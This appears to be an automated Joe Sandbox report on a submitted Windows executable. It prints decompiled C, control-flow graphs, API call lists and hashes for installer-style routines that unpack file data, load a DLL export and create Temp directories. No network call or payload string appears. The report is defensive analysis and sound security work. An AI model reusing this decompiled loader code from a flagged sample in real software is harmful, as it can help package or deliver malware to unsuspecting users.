                                                                                            • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                                                                                            • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                                                                                            • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                                                                                            • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 385 402f01-402f10 386 402f12-402f28 SetFilePointer 385->386 387 402f2e-402f39 call 40302c 385->387 386->387 390 403025-403029 387->390 391 402f3f-402f59 ReadFile 387->391 392 403022 391->392 393 402f5f-402f62 391->393 394 403024 392->394 393->392 395 402f68-402f7b call 40302c 393->395 394->390 395->390 398 402f81-402f84 395->398 399 402ff1-402ff7 398->399 400 402f86-402f89 398->400 403 402ff9 399->403 404 402ffc-40300f ReadFile 399->404 401 40301d-403020 400->401 402 402f8f 400->402 401->390 406 402f94-402f9c 402->406 403->404 404->392 405 403011-40301a 404->405 405->401 407 402fa1-402fb3 ReadFile 406->407 408 402f9e 406->408 407->392 409 402fb5-402fb8 407->409 408->407 409->392 410 402fba-402fcf WriteFile 409->410 411 402fd1-402fd4 410->411 412 402fed-402fef 410->412 411->412 413 402fd6-402fe9 411->413 412->394 413->406 414 402feb 413->414 414->401
                                                                                            C-Code - Quality: 93%
                                                                                            			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
                                                                                            				long _v8;
                                                                                            				intOrPtr _v12;
                                                                                            				void _t31;
                                                                                            				intOrPtr _t32;
                                                                                            				int _t35;
                                                                                            				long _t36;
                                                                                            				int _t37;
                                                                                            				long _t38;
                                                                                            				int _t40;
                                                                                            				int _t42;
                                                                                            				long _t43;
                                                                                            				long _t44;
                                                                                            				long _t55;
                                                                                            				long _t57;
                                                                                            
                                                                                            				_t31 = _a4;
                                                                                            				if(_t31 >= 0) {
                                                                                            					_t44 = _t31 +  *0x423ef8;
                                                                                            					 *0x41703c = _t44;
                                                                                            					SetFilePointer( *0x409014, _t44, 0, 0); // executed
                                                                                            				}
                                                                                            				_t57 = 4;
                                                                                            				_t32 = E0040302C(_t57);
                                                                                            				if(_t32 >= 0) {
                                                                                            					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
                                                                                            					if(_t35 == 0 || _v8 != _t57) {
                                                                                            						L23:
                                                                                            						_push(0xfffffffd);
                                                                                            						goto L24;
                                                                                            					} else {
                                                                                            						 *0x41703c =  *0x41703c + _t57;
                                                                                            						_t32 = E0040302C(_a4);
                                                                                            						_v12 = _t32;
                                                                                            						if(_t32 >= 0) {
                                                                                            							if(_a12 != 0) {
                                                                                            								_t36 = _a4;
                                                                                            								if(_t36 >= _a16) {
                                                                                            									_t36 = _a16;
                                                                                            								}
                                                                                            								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
                                                                                            								if(_t37 == 0) {
                                                                                            									goto L23;
                                                                                            								} else {
                                                                                            									_t38 = _v8;
                                                                                            									 *0x41703c =  *0x41703c + _t38;
                                                                                            									_v12 = _t38;
                                                                                            									goto L22;
                                                                                            								}
                                                                                            							} else {
                                                                                            								if(_a4 <= 0) {
                                                                                            									L22:
                                                                                            									_t32 = _v12;
                                                                                            								} else {
                                                                                            									while(1) {
                                                                                            										_t55 = 0x4000;
                                                                                            										if(_a4 < 0x4000) {
                                                                                            											_t55 = _a4;
                                                                                            										}
                                                                                            										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
                                                                                            										if(_t40 == 0 || _t55 != _v8) {
                                                                                            											goto L23;
                                                                                            										}
                                                                                            										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
                                                                                            										if(_t42 == 0 || _a16 != _t55) {
                                                                                            											_push(0xfffffffe);
                                                                                            											L24:
                                                                                            											_pop(_t32);
                                                                                            										} else {
                                                                                            											_t43 = _v8;
                                                                                            											_v12 = _v12 + _t43;
                                                                                            											_a4 = _a4 - _t43;
                                                                                            											 *0x41703c =  *0x41703c + _t43;
                                                                                            											if(_a4 > 0) {
                                                                                            												continue;
                                                                                            											} else {
                                                                                            												goto L22;
                                                                                            											}
                                                                                            										}
                                                                                            										goto L25;
                                                                                            									}
                                                                                            									goto L23;
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            				}
                                                                                            				L25:
                                                                                            				return _t32;
                                                                                            			}

















                                                                                            0x00402f06
                                                                                            0x00402f10
                                                                                            0x00402f19
                                                                                            0x00402f1d
                                                                                            0x00402f28
                                                                                            0x00402f28
                                                                                            0x00402f30
                                                                                            0x00402f32
                                                                                            0x00402f39
                                                                                            0x00402f55
                                                                                            0x00402f59
                                                                                            0x00403022
                                                                                            0x00403022
                                                                                            0x00000000
                                                                                            0x00402f68
                                                                                            0x00402f6b
                                                                                            0x00402f71
                                                                                            0x00402f78
                                                                                            0x00402f7b
                                                                                            0x00402f84
                                                                                            0x00402ff1
                                                                                            0x00402ff7
                                                                                            0x00402ff9
                                                                                            0x00402ff9
                                                                                            0x0040300b
                                                                                            0x0040300f
                                                                                            0x00000000
                                                                                            0x00403011
                                                                                            0x00403011
                                                                                            0x00403014
                                                                                            0x0040301a
                                                                                            0x00000000
                                                                                            0x0040301a
                                                                                            0x00402f86
                                                                                            0x00402f89
                                                                                            0x0040301d
                                                                                            0x0040301d
                                                                                            0x00402f8f
                                                                                            0x00402f94
                                                                                            0x00402f94
                                                                                            0x00402f9c
                                                                                            0x00402f9e
                                                                                            0x00402f9e
                                                                                            0x00402faf
                                                                                            0x00402fb3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402fc7
                                                                                            0x00402fcf
                                                                                            0x00402fed
                                                                                            0x00403024
                                                                                            0x00403024
                                                                                            0x00402fd6
                                                                                            0x00402fd6
                                                                                            0x00402fd9
                                                                                            0x00402fdc
                                                                                            0x00402fdf
                                                                                            0x00402fe9
                                                                                            0x00000000
                                                                                            0x00402feb
                                                                                            0x00000000
                                                                                            0x00402feb
                                                                                            0x00402fe9
                                                                                            0x00000000
                                                                                            0x00402fcf
                                                                                            0x00000000
                                                                                            0x00402f94
                                                                                            0x00402f89
                                                                                            0x00402f84
                                                                                            0x00402f7b
                                                                                            0x00402f59
                                                                                            0x00403025
                                                                                            0x00403029

                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402F28
                                                                                            • ReadFile.KERNELBASE(00409128,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
                                                                                            • ReadFile.KERNELBASE(00413038,00004000,?,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FAF
                                                                                            • WriteFile.KERNELBASE(00000000,00413038,?,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FC7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Read$PointerWrite
                                                                                            • String ID: 80A
                                                                                            • API String ID: 2113905535-195308239
                                                                                            • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                                                                                            • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                                                                                            • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                                                                                            • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 415 40302c-403055 GetTickCount 416 403196-40319e call 402bc5 415->416 417 40305b-403086 call 4031da SetFilePointer 415->417 422 4031a0-4031a5 416->422 423 40308b-40309d 417->423 424 4030a1-4030af call 4031a8 423->424 425 40309f 423->425 428 4030b5-4030c1 424->428 429 403188-40318b 424->429 425->424 430 4030c7-4030cd 428->430 429->422 431 4030f8-403114 call 405e9d 430->431 432 4030cf-4030d5 430->432 437 403191 431->437 438 403116-40311e 431->438 432->431 433 4030d7-4030f7 call 402bc5 432->433 433->431 442 403193-403194 437->442 440 403120-403136 WriteFile 438->440 441 403152-403158 438->441 443 403138-40313c 440->443 444 40318d-40318f 440->444 441->437 445 40315a-40315c 441->445 442->422 443->444 446 40313e-40314a 443->446 444->442 445->437 447 40315e-403171 445->447 446->430 448 403150 446->448 447->423 449 403177-403186 SetFilePointer 447->449 448->447 449->416
                                                                                            C-Code - Quality: 94%
                                                                                            			E0040302C(intOrPtr _a4) {
                                                                                            				long _v4;
                                                                                            				void* __ecx;
                                                                                            				intOrPtr _t12;
                                                                                            				intOrPtr _t13;
                                                                                            				signed int _t14;
                                                                                            				void* _t16;
                                                                                            				void* _t17;
                                                                                            				long _t18;
                                                                                            				int _t21;
                                                                                            				intOrPtr _t22;
                                                                                            				intOrPtr _t34;
                                                                                            				long _t35;
                                                                                            				intOrPtr _t37;
                                                                                            				void* _t39;
                                                                                            				long _t40;
                                                                                            				intOrPtr _t53;
                                                                                            
                                                                                            				_t35 =  *0x41703c; // 0x4fb52
                                                                                            				_t37 = _t35 -  *0x40afa8 + _a4;
                                                                                            				 *0x423eac = GetTickCount() + 0x1f4;
                                                                                            				if(_t37 <= 0) {
                                                                                            					L23:
                                                                                            					E00402BC5(1);
                                                                                            					return 0;
                                                                                            				}
                                                                                            				E004031DA( *0x41f04c);
                                                                                            				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
                                                                                            				 *0x41f048 = _t37;
                                                                                            				 *0x417038 = 0;
                                                                                            				while(1) {
                                                                                            					_t12 =  *0x417040; // 0x42479
                                                                                            					_t34 = 0x4000;
                                                                                            					_t13 = _t12 -  *0x41f04c;
                                                                                            					if(_t13 <= 0x4000) {
                                                                                            						_t34 = _t13;
                                                                                            					}
                                                                                            					_t14 = E004031A8(0x413038, _t34); // executed
                                                                                            					if(_t14 == 0) {
                                                                                            						break;
                                                                                            					}
                                                                                            					 *0x41f04c =  *0x41f04c + _t34;
                                                                                            					 *0x40afc8 = 0x413038;
                                                                                            					 *0x40afcc = _t34;
                                                                                            					L6:
                                                                                            					L6:
                                                                                            					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
                                                                                            						_t22 =  *0x41f048; // 0x44855
                                                                                            						 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
                                                                                            						E00402BC5(0);
                                                                                            					}
                                                                                            					 *0x40afd0 = 0x40b038;
                                                                                            					 *0x40afd4 = 0x8000; // executed
                                                                                            					_t16 = E00405E9D(0x40afb0); // executed
                                                                                            					if(_t16 < 0) {
                                                                                            						goto L21;
                                                                                            					}
                                                                                            					_t39 =  *0x40afd0; // 0x40f4d8
                                                                                            					_t40 = _t39 - 0x40b038;
                                                                                            					if(_t40 == 0) {
                                                                                            						__eflags =  *0x40afcc; // 0x0
                                                                                            						if(__eflags != 0) {
                                                                                            							goto L21;
                                                                                            						}
                                                                                            						__eflags = _t34;
                                                                                            						if(_t34 == 0) {
                                                                                            							goto L21;
                                                                                            						}
                                                                                            						L17:
                                                                                            						_t18 =  *0x41703c; // 0x4fb52
                                                                                            						if(_t18 -  *0x40afa8 + _a4 > 0) {
                                                                                            							continue;
                                                                                            						}
                                                                                            						SetFilePointer( *0x409014, _t18, 0, 0); // executed
                                                                                            						goto L23;
                                                                                            					}
                                                                                            					_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
                                                                                            					if(_t21 == 0 || _t40 != _v4) {
                                                                                            						_push(0xfffffffe);
                                                                                            						L22:
                                                                                            						_pop(_t17);
                                                                                            						return _t17;
                                                                                            					} else {
                                                                                            						 *0x40afa8 =  *0x40afa8 + _t40;
                                                                                            						_t53 =  *0x40afcc; // 0x0
                                                                                            						if(_t53 != 0) {
                                                                                            							goto L6;
                                                                                            						}
                                                                                            						goto L17;
                                                                                            					}
                                                                                            					L21:
                                                                                            					_push(0xfffffffd);
                                                                                            					goto L22;
                                                                                            				}
                                                                                            				return _t14 | 0xffffffff;
                                                                                            			}



















                                                                                            0x00403030
                                                                                            0x0040303d
                                                                                            0x00403050
                                                                                            0x00403055
                                                                                            0x00403196
                                                                                            0x00403198
                                                                                            0x00000000
                                                                                            0x0040319e
                                                                                            0x00403061
                                                                                            0x00403074
                                                                                            0x0040307a
                                                                                            0x00403080
                                                                                            0x0040308b
                                                                                            0x0040308b
                                                                                            0x00403090
                                                                                            0x00403095
                                                                                            0x0040309d
                                                                                            0x0040309f
                                                                                            0x0040309f
                                                                                            0x004030a8
                                                                                            0x004030af
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004030b5
                                                                                            0x004030bb
                                                                                            0x004030c1
                                                                                            0x00000000
                                                                                            0x004030c7
                                                                                            0x004030cd
                                                                                            0x004030d7
                                                                                            0x004030ed
                                                                                            0x004030f2
                                                                                            0x004030f7
                                                                                            0x004030fd
                                                                                            0x00403103
                                                                                            0x0040310d
                                                                                            0x00403114
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403116
                                                                                            0x0040311c
                                                                                            0x0040311e
                                                                                            0x00403152
                                                                                            0x00403158
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040315a
                                                                                            0x0040315c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040315e
                                                                                            0x0040315e
                                                                                            0x00403171
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403180
                                                                                            0x00000000
                                                                                            0x00403180
                                                                                            0x0040312e
                                                                                            0x00403136
                                                                                            0x0040318d
                                                                                            0x00403193
                                                                                            0x00403193
                                                                                            0x00000000
                                                                                            0x0040313e
                                                                                            0x0040313e
                                                                                            0x00403144
                                                                                            0x0040314a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403150
                                                                                            0x00403191
                                                                                            0x00403191
                                                                                            0x00000000
                                                                                            0x00403191
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00403041
                                                                                              • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8
                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                                                                                            • WriteFile.KERNELBASE(0040B038,0040F4D8,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
                                                                                            • SetFilePointer.KERNELBASE(0004FB52,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Pointer$CountTickWrite
                                                                                            • String ID: 80A
                                                                                            • API String ID: 2146148272-195308239
                                                                                            • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                                                                                            • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                                                                                            • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                                                                                            • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 450 401f51-401f5d 451 401f63-401f79 call 4029e8 * 2 450->451 452 40200b-40200d 450->452 462 401f88-401f96 LoadLibraryExA 451->462 463 401f7b-401f86 GetModuleHandleA 451->463 453 402156-40215b call 401423 452->453 459 40287d-40288c 453->459 464 402004-402006 462->464 465 401f98-401fa6 GetProcAddress 462->465 463->462 463->465 464->453 467 401fe5-401fea call 404e23 465->467 468 401fa8-401fae 465->468 473 401fef-401ff2 467->473 469 401fb0-401fbc call 401423 468->469 470 401fc7-401fde call 72b210a0 468->470 469->473 478 401fbe-401fc5 469->478 475 401fe0-401fe3 470->475 473->459 476 401ff8-401fff FreeLibrary 473->476 475->473 476->459 478->473
                                                                                            C-Code - Quality: 57%
                                                                                            			E00401F51(void* __ebx, void* __eflags) {
                                                                                            				struct HINSTANCE__* _t18;
                                                                                            				struct HINSTANCE__* _t25;
                                                                                            				void* _t26;
                                                                                            				struct HINSTANCE__* _t29;
                                                                                            				CHAR* _t31;
                                                                                            				intOrPtr* _t32;
                                                                                            				void* _t33;
                                                                                            
                                                                                            				_t26 = __ebx;
                                                                                            				asm("sbb eax, 0x423f58");
                                                                                            				 *(_t33 - 4) = 1;
                                                                                            				if(__eflags < 0) {
                                                                                            					_push(0xffffffe7);
                                                                                            					L14:
                                                                                            					E00401423();
                                                                                            					L15:
                                                                                            					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
                                                                                            					return 0;
                                                                                            				}
                                                                                            				_t31 = E004029E8(0xfffffff0);
                                                                                            				 *(_t33 + 8) = E004029E8(1);
                                                                                            				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
                                                                                            					L3:
                                                                                            					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
                                                                                            					_t29 = _t18;
                                                                                            					if(_t29 == _t26) {
                                                                                            						_push(0xfffffff6);
                                                                                            						goto L14;
                                                                                            					}
                                                                                            					L4:
                                                                                            					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
                                                                                            					if(_t32 == _t26) {
                                                                                            						E00404E23(0xfffffff7,  *(_t33 + 8));
                                                                                            					} else {
                                                                                            						 *(_t33 - 4) = _t26;
                                                                                            						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
                                                                                            							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
                                                                                            						} else {
                                                                                            							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
                                                                                            							if( *_t32() != 0) {
                                                                                            								 *(_t33 - 4) = 1;
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
                                                                                            						FreeLibrary(_t29);
                                                                                            					}
                                                                                            					goto L15;
                                                                                            				}
                                                                                            				_t25 = GetModuleHandleA(_t31); // executed
                                                                                            				_t29 = _t25;
                                                                                            				if(_t29 != __ebx) {
                                                                                            					goto L4;
                                                                                            				}
                                                                                            				goto L3;
                                                                                            			}










                                                                                            0x00401f51
                                                                                            0x00401f51
                                                                                            0x00401f56
                                                                                            0x00401f5d
                                                                                            0x0040200b
                                                                                            0x00402156
                                                                                            0x00402156
                                                                                            0x0040287d
                                                                                            0x00402880
                                                                                            0x0040288c
                                                                                            0x0040288c
                                                                                            0x00401f6c
                                                                                            0x00401f76
                                                                                            0x00401f79
                                                                                            0x00401f88
                                                                                            0x00401f8c
                                                                                            0x00401f92
                                                                                            0x00401f96
                                                                                            0x00402004
                                                                                            0x00000000
                                                                                            0x00402004
                                                                                            0x00401f98
                                                                                            0x00401fa2
                                                                                            0x00401fa6
                                                                                            0x00401fea
                                                                                            0x00401fa8
                                                                                            0x00401fab
                                                                                            0x00401fae
                                                                                            0x00401fde
                                                                                            0x00401fb0
                                                                                            0x00401fb3
                                                                                            0x00401fbc
                                                                                            0x00401fbe
                                                                                            0x00401fbe
                                                                                            0x00401fbc
                                                                                            0x00401fae
                                                                                            0x00401ff2
                                                                                            0x00401ff9
                                                                                            0x00401ff9
                                                                                            0x00000000
                                                                                            0x00401ff2
                                                                                            0x00401f7c
                                                                                            0x00401f82
                                                                                            0x00401f86
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                                                                              • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                                                                                              • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                                                                                              • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                                                                                              • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                                                                                              • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                                                                                              • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                                                                                              • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                                                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                            • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                            • String ID: ?B
                                                                                            • API String ID: 2987980305-117478770
                                                                                            • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                                                                                            • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                                                                                            • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                                                                                            • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 480 4015b3-4015c6 call 4029e8 call 40560c 485 4015c8-4015e3 call 4055a3 CreateDirectoryA 480->485 486 40160a-40160d 480->486 495 401600-401608 485->495 496 4015e5-4015f0 GetLastError 485->496 488 40162d-40215b call 401423 486->488 489 40160f-401628 call 401423 call 405a85 SetCurrentDirectoryA 486->489 502 40287d-40288c 488->502 489->502 495->485 495->486 499 4015f2-4015fb GetFileAttributesA 496->499 500 4015fd 496->500 499->495 499->500 500->495
                                                                                            C-Code - Quality: 85%
                                                                                            			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                                                                                            				struct _SECURITY_ATTRIBUTES** _t10;
                                                                                            				int _t19;
                                                                                            				struct _SECURITY_ATTRIBUTES* _t20;
                                                                                            				signed char _t22;
                                                                                            				struct _SECURITY_ATTRIBUTES* _t23;
                                                                                            				CHAR* _t25;
                                                                                            				struct _SECURITY_ATTRIBUTES** _t29;
                                                                                            				void* _t30;
                                                                                            
                                                                                            				_t23 = __ebx;
                                                                                            				_t25 = E004029E8(0xfffffff0);
                                                                                            				_t10 = E0040560C(_t25);
                                                                                            				_t27 = _t10;
                                                                                            				if(_t10 != __ebx) {
                                                                                            					do {
                                                                                            						_t29 = E004055A3(_t27, 0x5c);
                                                                                            						 *_t29 = _t23;
                                                                                            						 *((char*)(_t30 + 0xb)) =  *_t29;
                                                                                            						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                                                                            						if(_t19 == 0) {
                                                                                            							if(GetLastError() != 0xb7) {
                                                                                            								L4:
                                                                                            								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                                                                            							} else {
                                                                                            								_t22 = GetFileAttributesA(_t25); // executed
                                                                                            								if((_t22 & 0x00000010) == 0) {
                                                                                            									goto L4;
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                                                                            						 *_t29 = _t20;
                                                                                            						_t27 =  &(_t29[0]);
                                                                                            					} while (_t20 != _t23);
                                                                                            				}
                                                                                            				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                                                                            					_push(0xfffffff5);
                                                                                            					E00401423();
                                                                                            				} else {
                                                                                            					E00401423(0xffffffe6);
                                                                                            					E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
                                                                                            					SetCurrentDirectoryA(_t25); // executed
                                                                                            				}
                                                                                            				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                                                                                            				return 0;
                                                                                            			}











                                                                                            0x004015b3
                                                                                            0x004015ba
                                                                                            0x004015bd
                                                                                            0x004015c2
                                                                                            0x004015c6
                                                                                            0x004015c8
                                                                                            0x004015d0
                                                                                            0x004015d6
                                                                                            0x004015d8
                                                                                            0x004015db
                                                                                            0x004015e3
                                                                                            0x004015f0
                                                                                            0x004015fd
                                                                                            0x004015fd
                                                                                            0x004015f2
                                                                                            0x004015f3
                                                                                            0x004015fb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004015fb
                                                                                            0x004015f0
                                                                                            0x00401600
                                                                                            0x00401603
                                                                                            0x00401605
                                                                                            0x00401606
                                                                                            0x004015c8
                                                                                            0x0040160d
                                                                                            0x0040162d
                                                                                            0x00402156
                                                                                            0x0040160f
                                                                                            0x00401611
                                                                                            0x0040161c
                                                                                            0x00401622
                                                                                            0x00401622
                                                                                            0x00402880
                                                                                            0x0040288c

                                                                                            APIs
                                                                                              • Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\Desktop\O53TFikPkp.exe" ,73BCF560), ref: 0040561A
                                                                                              • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                                                                                              • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                                                                                            • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                            • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
